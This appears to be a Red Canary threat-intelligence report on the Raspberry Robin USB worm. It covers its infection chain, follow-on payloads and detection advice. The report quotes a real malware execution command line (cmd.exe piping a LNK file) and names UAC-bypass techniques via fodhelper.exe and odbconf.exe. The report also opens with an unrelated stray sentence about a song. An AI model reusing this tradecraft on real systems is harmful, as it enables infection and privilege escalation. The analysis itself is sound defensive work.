We’re just stunned this song exists at all. Call us, Christopher.
Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog published in May 2022. Following our post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial blog publication, Raspberry Robin evolved from a growing curiosity to a widely distributed malicious downloader. Raspberry Robin was Red Canary’s 7th most prevalent threat in 2022.
Raspberry Robin activity observed by Red Canary remained at a fairly consistent frequency between January and June of 2022. In the latter half of 2022, we saw a significant increase in activity, beginning in August. The six-month period of July through December 2022 saw, on average, a 114 percent increase in observed Raspberry Robin activity compared to the first 6 months of the year. There may be several reasons for this increase, the most likely being both a rise in actual Raspberry Robin infections as well as improved detection of the threat by Red Canary and other vendors.
Initial Raspberry Robin activity
A Raspberry Robin infection often starts when a user plugs an infected USB drive into their endpoint. Based on community feedback we received after our blog post, one common source for Raspberry Robin infections appears to be USB drives previously used at print shops and mailing centers. After the drive is connected, cmd.exe receives a command to read and execute a randomly named file with a seemingly random two-to-three character file extension. There is frequently additional whitespace in this command: cmd.exe /q/V/R TYPE QLiet.sAV|Cmd
The file is a LNK file that contains a distinctive Windows Installer (msiexec.exe) command. The msiexec command typically includes the following:
a short domain containing only a few characters
communication over port 8080
a string of random alphanumeric characters potentially used as a token
the victim hostname and/or username
Here is an example of what the command line might look like:
If the outbound network connection is successful, msiexec.exe downloads and installs a randomly named malicious DLL, typically in C:\ProgramData\<randomly-named subdirectory>. The DLL name is two-to-eight random characters, followed by a three-character file extension. Extensions we’ve observed include .tmp, .etl, .log, and others. The Raspberry Robin DLL, also known as Roshtyak, can be executed by several different processes in an attempt to elevate privileges and bypass User Access Control (UAC), based on which type of evasion is most likely to be successful. Red Canary has observed fodhelper.exe and odbconf.exe used to execute the malicious DLL.
The DLL has a wide variety of functions, including additional C2 activity, task creation for persistence, and the capability to download and execute additional payloads. In July 2022, Microsoft reported seeing SocGholish as a follow-on payload, observing activity resembling the group they track as DEV-0243, which is associated with the cybercriminal group known as Evil Corp. Red Canary also directly observed Raspberry Robin downloading a malicious SocGholish .js binary. This development significantly heightened the risk of a Raspberry Robin infection, making it a potential ransomware precursor based on historic DEV-0243 and SocGholish activity. In October 2022, Microsoft shared additional Raspberry Robin observations, most notably that they saw Raspberry Robin used in compromises with follow-on activity including BumbleBee, Cobalt Strike, and IcedID. Microsoft additionally reported that Raspberry Robin was observed in post-compromise activity attributed to DEV-0950, a group that overlaps with activity tracked as TA505.
If Raspberry Robin is detected in your environment, we recommend taking steps to block malicious network connections to help prevent follow-on activity and the download of malicious files. We also recommend removing malicious files from the infected system. If additional follow-on activity is detected in your environment, we recommend that you isolate the device. Rapid detection and response early in the infection chain prevents continued progression of this threat.
Windows Installer (msiexec.exe) downloading and executing packages
To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command-line interface will give you the opportunity to examine the activity and determine if it’s malicious or not.
Privacy & Cookies Policy
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.